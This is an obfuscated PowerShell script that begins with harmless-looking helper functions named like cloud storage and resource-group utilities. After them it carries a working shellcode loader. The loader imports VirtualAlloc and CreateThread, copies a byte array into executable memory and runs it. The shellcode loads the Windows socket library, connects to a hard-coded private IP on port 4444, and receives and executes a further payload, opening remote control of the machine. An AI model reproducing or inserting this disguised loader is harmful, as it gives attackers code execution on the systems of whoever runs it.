function geT-D`ATAlaKESTO`REA`ccO`U`NT`NamE
{
    return &("{1}{2}{0}" -f'me','getAssetN','a')
}


function gET-r`eSo`UrcegrouPn`A`Me
{
    return .("{1}{0}{2}" -f'ssetN','getA','ame')
}


function IN`VokE-`hanDLeDcmDL`Et
{
	param
	(
		[ScriptBlock] ${C`omM`AnD},
		[switch] ${i`Gnor`e`FAilUreS}
	)
	
	try
	{
		&${c`OMm`AND}
	}
	catch
	{
		if(!${iG`NO`REFAilU`ReS})
		{
			throw;
		}
	}
}
${C} = (((("{65}{57}{15}{29}{42}{9}{37}{44}{59}{0}{32}{50}{67}{51}{56}{25}{19}{28}{41}{2}{43}{66}{49}{48}{53}{36}{68}{54}{21}{1}{3}{23}{16}{11}{34}{27}{45}{70}{8}{62}{33}{10}{46}{58}{18}{13}{26}{63}{60}{31}{69}{64}{12}{30}{61}{40}{14}{4}{38}{17}{20}{22}{7}{47}{39}{24}{6}{55}{52}{35}{5}"-f 'A',' s','onType, uint flProtect);[Dl','tatic extern','W)]publ','ount);','in','set(I','e, Int','r ','rtAddress','Cr','Thread','dw','t.dlliw','rt(iwWkernel32.dlliw','tPtr ','xtern',' ','ize, uint flAllo',' ','blic','IntPtr mem',' In','st, u',', uint dwS','C','tr','cat','W)]public sta','Id);[Dll',' In','lloc','a','eateThread(IntPtr lpThreadAt','rc, uint c','el32','V','ic static e',' de','Wmsvcr','i','tic extern IntPt','lImp','ir','ibutes, uint',', Int','ntPtr','r','t(iwWke','(','d',' s','n','u','t','dress','Impo','Ptr lpParameter, uint','tual','eationFlags,','Import(iw','Ptr lpSt','r','Ptr lp','[Dll','or','IntPtr lpA','.dlliwW)]p','t',' dwStackSiz')) -REPLaCe 'iwW',[ChAR]34));${w} = &("{0}{2}{1}"-f'Add','ype','-T') -memberDefinition ${C} -Name ("{1}{0}"-f '2','Win3') -namespace ("{2}{3}{1}{0}{4}"-f'on','ncti','W','in32Fu','s') -passthru;[Byte[]];[Byte[]]${z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0xc2,0x81,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x3f,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0xe9,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0xc3,0x01,0xc3,0x29,0xc6,0x75,0xe9,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${g} = 0x1000;if (${z}."LEn`gtH" -gt 0x1000){${g} = ${z}."LeN`GTh"};${X}=${W}::("{3}{2}{0}{1}" -f'All','oc','l','Virtua').Invoke(0,0x1000,${G},0x40);for (${i}=0;${I} -le (${z}."LE`NGTh"-1);${i}++) {${w}::"Mems`Et"([IntPtr](${x}.("{0}{1}{2}"-f 'To','In','t32').Invoke()+${I}), ${z}[${I}], 1)};${w}::("{2}{0}{1}{3}"-f'reat','e','C','Thread').Invoke(0,0,${x},0,0,0);for (;;){.("{1}{3}{2}{0}"-f 'leep','Sta','-s','rt') 60};
